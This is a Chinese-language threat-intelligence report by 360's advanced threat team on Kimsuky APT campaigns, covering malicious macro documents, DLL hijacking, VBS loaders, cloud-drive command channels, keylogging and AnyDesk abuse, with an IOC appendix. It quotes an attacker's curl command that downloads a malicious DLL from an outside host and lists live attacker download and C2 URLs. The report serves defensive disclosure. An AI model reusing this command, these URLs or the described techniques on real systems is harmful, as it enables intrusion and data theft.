Kimsuky组织（又名BabyShark、Thallium、Black Banshee等），最早由国外安全厂商Kaspersky在2013年披露，该组织长期针对于韩国的智囊团、政府外交、新闻媒体等组织机构进行攻击，主要目的为窃取情报、间谍活动等。

2020年12月期间，360高级威胁研究院在日常的监控中发现了一起该组织的鱼叉攻击活动，通过相关样本的关联溯源分析，我们又发现了与该组织攻击活动相关的一批失陷服务器，进而发现了Kimsuky组织的一系列网络攻击活动的线索，通过对该组织各种网络攻击程序、后门程序和测试样本的分析，我们发现了babyshark等该组织专属恶意软件的特征。通过相关攻击活动的分析，本报告将向业界展现Kimsuky组织更多的攻击者面貌。

1. 鱼叉攻击活动分析

此次鱼叉攻击使用的恶意宏文档，受害者启用文档的宏后，通过云端动态下发VBS脚本的方式实施攻击，因此极难获取攻击的完整样本。通过360安全大脑我们还原捕获到了Kimsuky组织的部分攻击样本和完整攻击流程。该组织的攻击行动具备以下特点：

• 使用version.dll、wtsapi32.dll和version_hwp.dll不同名称的DLL劫持库实施攻击

• 使用恶意的Normal.dotm替换 Office模版执行恶意宏代码[0]

• 通过OneDrive云盘和被黑网站放置恶意荷载，动态执行控制命令和恶意VBS脚本

  其完整攻击流程如下:

1.1 version.dll

该程序会触发恶意代码执行使用curl下载tmp文件，解码tmp文件 到%UserProfile%AppDataLocalTemp 目录，随后将其重命名为version.dll。

通过version.dll的下载攻击行为特征，我们关联到一些历史攻击的诱饵文档，经过验证发现文档中宏代码暴露的链接已全部失效。

Download URL	文件名	关联文档
https://assuredshippings.com/wp-admin/includes/1023k/c.php?op=dotm	dgdgdf.tmp	111.docx
https://assuredshippings.com/wp-admin/includes/1023k/d.php?op=ver.gif	version.dll	111.docx
https://assuredshippings.com/wp-admin/includes/1023c/d.php?op=ver.gif	version.dll	Microsoft Word Document.docx
https://assuredshippings.com/wp-admin/includes/1023c/d.php?op=nd.gif	Normal.dotm	* strategic insights memo (1).doc
	wtsapi32.dll	doc-src1.docm

通过version.dll的攻击行为，我们在受害机器上关联发现了其他不同攻击批次的DLL劫持样本

MD5	文件名	导出库名	编译时间
2d9b478d3161eaea8060d38d0a2dc8f5	wtsapi32.dll	version.dll	2020-10-22 09:45:42
c2be3221ba6b7722d1e0941995c0ab3a	version_hwp.dll	version.dll	2020-12-20 08:52:08

1.2 version_hwp.dll

该恶意程序会从Google云盘地址获取下载执行命令，如：

https://drive[.]google[.]com/file/d/1X4hJhlAjqVk7cChNSBt_SCrTi07LMVN7/view?usp=sharing

我们捕获到了其中一些下载文件执行命令，其通过Curl命令从另外的URL地址下载恶意的DLL劫持库

cmd.exe /c %windir%sysnativecurl -o "%temp%qazwsxe.tmp" https://newwebsearcher[.]com/winmm/winmmnew.php?op=step

程序在最后执行一段命令，目的是重启被劫持的应用程序，使之正常运行。这里可看出程序的意图并没有驻留，而是多次执行。

1.3 wtsapi32.dll

该程序内部硬编码了大量base64字符串，这些字符串属于两个VBS脚本。程序功能简单，base64解码这些字符串并执行。

第一个脚本被写入临时目录下的文件，以文件路径的形式出现在命令行，第二个脚本的代码直接以参数的形式出现在命令行。第一个脚本的功能是执行参数中的代码，第二个脚本的功能是从OneDrive网盘下载VBS代码解密执行。

我们统计了相关的OneDrive链接。

URL	响应
https://onedrive.live.com/authkey=%21AIW%5FrqLWyCK2Q3I&cid=D2BAA5608337CD50&id=D2BAA5608337CD50%21106&parId=root&o=OneUp	失效
https://onedrive.live.com/?authkey=%21AA1TpZt2wbC2q34&cid=EA63197CF6E2BF62&id=EA63197CF6E2BF62%21137&parId=root&o=OneUp	正常
https://onedrive.live.com/authkey=%21AEOvkavD-Cveo34&cid=FF254DB40FA2A3BA&id=FF254DB40FA2A3BA%21107&parId=root&o=OneUp	失效

从OneDrive网盘下载的VBS代码只是向https://assuredshippings[.]com/wp-admin/css/colors/coffee/alive.php?op=[username]发送请求码，这可能是在执行完一系列部署命令后最终执行的代码，向服务端报告存活状态。

1.4 vbs脚本

version.dll劫持的程序会执行临时目录（ %UserProfile%AppDataLocalTemp）的ctr.vbs脚本。

通过分析ctr.vbs使用的大段命令参数，我们推测该脚本的主要功能是解码并执行参数对应的混淆VBS代码,这与wtsapi32.dll的功能相似，由crt.vbs向OneDrive网盘地址发送请求，以接收文件代码并执行命令。

从进程行为分析我们发现了攻击者通过OneDrive动态执行的更多命令。如：建立计划任务，通过VBS脚本和命令参数从注册表中动态读取恶意代码执行。

如下载到的desktop.tmp脚本动态执行,相关的攻击会收集用户名，进程列表，特定目录下文件列表信息，这些信息经过certutil编码后上传到服务器。

另外，我们还观察到计划任务执行的powershell命令，代码检查的互斥锁是开源远控工具Quasar使用的互斥锁名称，疑似攻击者下载执行了不同的开源木马程序。

2. 失陷服务器追踪

我们通过360安全大脑对该组织鱼叉攻击活动中的恶意样本进行了全网遥测，意外的发现了一大批服务器中招，大部分失陷服务器上都出现了detect.vbs样本，这部分样本疑似是在攻击者通过远程桌面连接后的第一个部署的后门文件，其通过计划任务执行，功能是向指定站点发送请求，请求参数部分包含本机的IP地址。

这部分失陷服务器上出现了rdp扫描工具样本，相关服务器也都开放了3389端口，疑似该组织通过远程桌面服务的漏洞或弱口令入侵了服务器，其中部分服务器也使用了teamviewer软件，这可能是该组织的另一种入侵途径。

经过进一步的追踪，我们在失陷服务器上发现了大量的恶意测试样本和网络攻击工具包。

2.1 恶意文档测试样本

我们发现了一类测试恶意文档测试样本，文档文件名为doc-src.doc，文档本身带有密码，输入密码打开后会提示启用内容

恶意宏代码首先会获取本机安装的杀软信息,并发送到

http://okbus[.]or[.]kr/libs/phpmailer/his[.]php?op=AntiList(检测到的杀软) + "---doc_macro" 。

然后根据机器安装杀软的情况执行不同的策略。根据最终执行的文件发现其中几种执行策略功能基本相同，只是文件结构上的存在差异，根据文件结构可以分为两种策略。

执行策略流程简图

第一种策略：使用一系列脚本 最终通过httpxmu下载的 tskekhqo从https://newspeers[.]com/000/wjb/expres[.]php?op=2下载解密最终载荷 desktop.tmp。

名称	功能简述
stacer.vbs	持久化并启动  nxtelexl.bat
nxtelexl.bat	启动templbs.vbs，并判断是否有hiscwpd,不存在的话则创建并写入a,执行 funwifuv、droxfnxr
hiscwpd	标志
templbs.vbs	删除  stacer.vbs 启动  nxtelexl.bat
funwifuv	解码
droxfnxr	判断hiscwpd 内容执行不同脚本, 下载文件 httpxmu
httpxmu	下载文件 tskekhqo
tskekhqo	下载执行desktop.tmp
desktop.tmp	收集计算机信息编码后发送

第二种策略：最终通过11.vbs 下载的tskekhqo 从 https://newspeers[.]com/000/wjb/expres[.]php?op=2下载解密最终载荷。

名称	功能简述
stacer.vbs	启动templbs.vbs、 11.vbs、12.vbs
templbs.vbs	创建 11.vbs 、12.vbs
11.vbs	下载tskekhqo
11.vbs	解码执行tskekhqo
tskekhqo	下载执行 desktop.tmp
desktop.tmp	收集计算机信息编码后发送

两种方式 下载tskekhqo的前期文件一个是由httpxmu下载得到，一个是由templbs.vbs直接释放得到,其最终流程都是下载 desktop.tmp。

desktop.tmp功能为将 计算机的用户名、进程信息、目录信息进行编码后发送到服务器。

2.2 远程控制测试样本

我们还发现了一类远程控制类测试样本，其通过二次封装anydesk软件的恶意样本，其中一个文件的名称为change_with_anydesk_now.bat。

根据文件名称的意义，我们推测攻击者在获取远程控制后会使用anydesk作为后续的控制手段，也可能是攻击者在单纯地测试这种远程手段。

2.1.1 窗口隐藏

该测试样本通过BAT、VBS脚本通过计划任务启动恶意程序，最终通过ieUpSrv.exe启动ieUpdate.exe实现anydesk窗口的隐藏。启动流程如下：

两个PE程序的pdb路径暴露了该组织的一些开发信息。

ieupsrv.exe	G:414 taskImpersonateServiceImpersonateServiceReleaseImpersonateService.pdb
ieupdate.exe	G:414  taskhidewindows_completeany_exeany_exeReleaseany_exe.pdb

2.2.2 Anydesk安装

在少数受害机器上也发现了anydesk的部署安装工具。

功能	简述
install1.bat	拷贝所需要的文件到  C:MSOPerfsCONEXANT,创建服务启动revival.exe
revival.exe	启动smss.bat
smss.bat	启动update.vbs
update.vbs	链接服务器，根据响应执行相应动作

update.vbs从https:// drive[.]google[.]com/file/d/1U0nol0QNV2la59upnseQruXaUS64cuqH获取响应内容执行命令， revival_function函数的主要功能是创建执行anydesk程序的服务。

通过对云盘链接的监控，我们还发现攻击者动态执行了添加用户的命令。

2.2.3 键盘记录

我们还发现了键盘记录和收集用户信息的工具样本，其中install.vbs根据操作系统位数执行不同版本的文件，最终执行ieCert.ps1 完成键盘记录保存为ttmp.log。完整攻击流程如下：

其利用schedule.xml创建的计划任务定期执行ieCert.vbs，将计算机信息以及键盘记录上传到服务器。

2.3 攻击工具包

在失陷服务器上我们还捕获到了一个压缩包，其中包含了该组织使用的多个安全工具，其中部分工具已出现在部分失陷服务器机器中。

文件名	功能
cloud.rar	对应远程控制部分
infomation	收集信息
KPortScan 3.0	端口扫描
Last.zip	对应键盘记录部分
mimikatz.rar	windows凭证窃取工具
Mstsc-2003.zip	windows远程桌面（客户端程序）
Narrator___.zip	rdp attack
safe
win10_.zip
win7_.zip
1220.rar	需要密码
Antivirus_1121.xlsx	需要密码
Antivirus_scorpion.xlsx	需要密码
chromecookiesview-1.90.zip	谷歌浏览器COOKIES查看工具
ps.zip	PsExec
RDPWrap-v1.6.2.zip	远程多用户登录工具
Utilman.zip	Windows辅助工具管理器程序
webbrowserpassview-2.07.rar	浏览器密码查看工具
WinNarrator.exe	rdp attack

其中部分PE文件存在朝鲜语资源。

2.4 其它发现

在失陷服务器的样本中还出现了挖矿勒索的攻击痕迹，“xmrig.exe”、“[email protected]”、“recover.txt”、“info.exe”等文件出现失陷服务器的文件系统中。目前没有发现这些攻击活动与Kimsuky有直接关联，疑似相关的失陷服务器存在大量的安全漏洞，有被不同的黑客入侵的历史。

3. 攻击关联分析

3.1 解密算法

第一个恶意文档的ctr.vbs在解密下阶段载荷时，使用的解密算法。

在第二个恶意文档释放的funwifuv文件，解码其它的脚本文件使用的解密算法。

键盘记录的ieCert.vbs在获取上传信息用的URL时使用了同样的解密算法。

这种解密算法在estsecurity的报告[1]中出现过。

3.2 URL参数

功能	参数
恶意文档下载version.dll	http://xxx/d.php?op=ver.gif
恶意文档下载Normal.dotm	http://xxx/d.php?op=nd.gif
恶意文档下载dgdgdf.tmp	http://xxx/c.php?op=dotm
响应ok	http://xxx/winmmnew.php?op=yun
响应ok	http://xxx/winmmnew.php?op=step
	http://xxx/redir.php?op=display
恶意文档上传杀软信息	http://xxx/his.php?op=[杀软信息]
恶意文档下载desktop.tmp	http://xxx/expres.php?op=2
	http://xxx/cow.php?op=1

类似的参数格式出现在estsecurity的两篇报告[2]中。

下载文件的URL参数以gif作为后缀是另一个相似的特征。

3.3 攻击手法

在攻击手法方面，相同的文件编码方式以及将收集的信息上传到 upload.php。

unit42关于babyshark的报告[3]

desktop.tmp中的代码

3.4 特定前后缀

version.dll在从远程获取命令字符串时，会从响应中剥离特定字符。

同样的处理发生在部署anydesk时，update.vbs从远程获取命令字符串时。

键盘记录工具的ieCert.vbs在获取URL时。

目前还未发现该特征与已有公开报告的关联。

总结

纵览本报告披露的Kimsuky组织整个攻击活动，我们可以看到该组织的攻击擅长以第三方云盘和被黑网站作为攻击基础设施，以往APT组织的攻击目标是核心的组织机构，而现在APT组织的攻击活动受害方已经蔓延到互联网业务和普通企业组织机构，APT组织不仅针对重要目标发起持续性的定向攻击窃取情报，还会利用第三方云盘中转恶意代码，同时积极地利用入侵网络中存在漏洞的服务器，将失陷服务器转化为攻击测试、挖矿和命令控制的网络基础设施。请相关组织机构提高警惕，针对自己的网络资产做好安全防护，以免沦为APT组织的“傀儡”帮凶。

附录 IOC

恶意文档

5b298ba27e4ff875391a0053677ba683

162c9018bda2e54059a376fe943b5056

d439b0aaa69b1650ee7b7e676b7d3c34

26d3ffb16324290c0d4bc76d4a596b19

命令执行

2d9b478d3161eaea8060d38d0a2dc8f5

68ce092f1a3d19852ea32db8388de5c7

c2be3221ba6b7722d1e0941995c0ab3a

脚本文件

d045f68ab46c920e9fa847e5ecbc875b

c8dfaa8adf29d7ff6c3364af9a68c5f2

1F41D601F1D4AF232D431EACC8558D96

D8454579389320217642D7DE6CC12327

0BBF969C6CAFCCB405B5EEA050F6360A

411991CD5A0E37164718A79565E62789

6FC7824938F5D035E429C2159E02D54D

B97BDB382CAEDA9516B5FB235ED12C31

D8454579389320217642D7DE6CC12327

6E6864A37499AAC4007196FC4BEDF952

7CEFC963890ABBDEFAB74BB9517025AE

36C671C3A9C5B327735E4A4E6E7EA8F3

125749B2CA02D057D00AAA964DFF21EB

26AA11F0B20E98E1A68AC915BA7371FB

34E5BD2D5DC89D4609EE1DFDF99279C6

4E010DB5289B510CE9FA5E9DC8C5B4CC

82891C49C497AE023F7BCDED6E8A3805

85E19CF8281C4AF7BE4C8F9B957D7E91

E4D38E4DBBA7746844964BE36920D592

F6DFE797F2A6975BF5E5871B06FE6346

61D7F3F87E7D111CC844C1291F4E4DDD

8A28CCB46E85F4AC30932D37CD6F0F45

96402740644D2C516A70174D66E7FC37

E473D4B6AD27468E6B3CBAD260300F60

EC70D10A7FD033FE4FF1B1535E9F2EA2

URL

https://drive.google.com/file/d/1X4hJhlAjqVk7cChNSBt_SCrTi07LMVN7/view?usp=sharing

https://drive.google.com/file/d/1CP1c5v1m2pxH8zIFht0tZ_EuNJjMS6hF/view

https://newwebsearcher.com/winmm/winmmnew.php?op=yun

https://newwebsearcher.com/winmm/winmmnew.php?op=step

https://assuredshippings.com/wp-admin/includes/1023k/c.php?op=dotm

https://assuredshippings.com/wp-admin/includes/1023k/d.php?op=ver.gif

https://assuredshippings.com/wp-admin/includes/1023c/d.php?op=ver.gif

https://assuredshippings.com/wp-admin/includes/1015/d.php?op=ver.gif

https://assuredshippings.com/wp-admin/includes/1015/d.php?op=nd.gif

https://onedrive.live.com/authkey=%21AIW%5FrqLWyCK2Q3I&cid=D2BAA5608337CD50&id=D2BAA5608337CD50%21106&parId=root&o=OneUp

https://onedrive.live.com/?authkey=%21AA1TpZt2wbC2q34&cid=EA63197CF6E2BF62&id=EA63197CF6E2BF62%21137&parId=root&o=OneUp

https://onedrive.live.com/authkey=%21AEOvkavD-Cveo34&cid=FF254DB40FA2A3BA&id=FF254DB40FA2A3BA%21107&parId=root&o=OneUp

https://assuredshippings.com/wp-admin/css/colors/coffee/alive.php

http://okbus.or.kr/libs/phpmailer/his.php

https://newspeers.com/000/wjb/expres.php?op=2

https://newspeers.com/000/wjb/cow.php?op=1

https://newspeers.com/000/wjb/upload.php

团队介绍

TEAM INTRODUCTION

360高级威胁研究院

360高级威胁研究院是360政企安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。

                     

---

[0] https://attack.mitre.org/techniques/T1137/001/

[1] https://blog.alyac.co.kr/2243

[2] https://blog.alyac.co.kr/2243, https://blog.alyac.co.kr/3458

[3] https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

本文始发于微信公众号（360威胁情报中心）：Kimsuky组织网络攻击活动追溯分析报告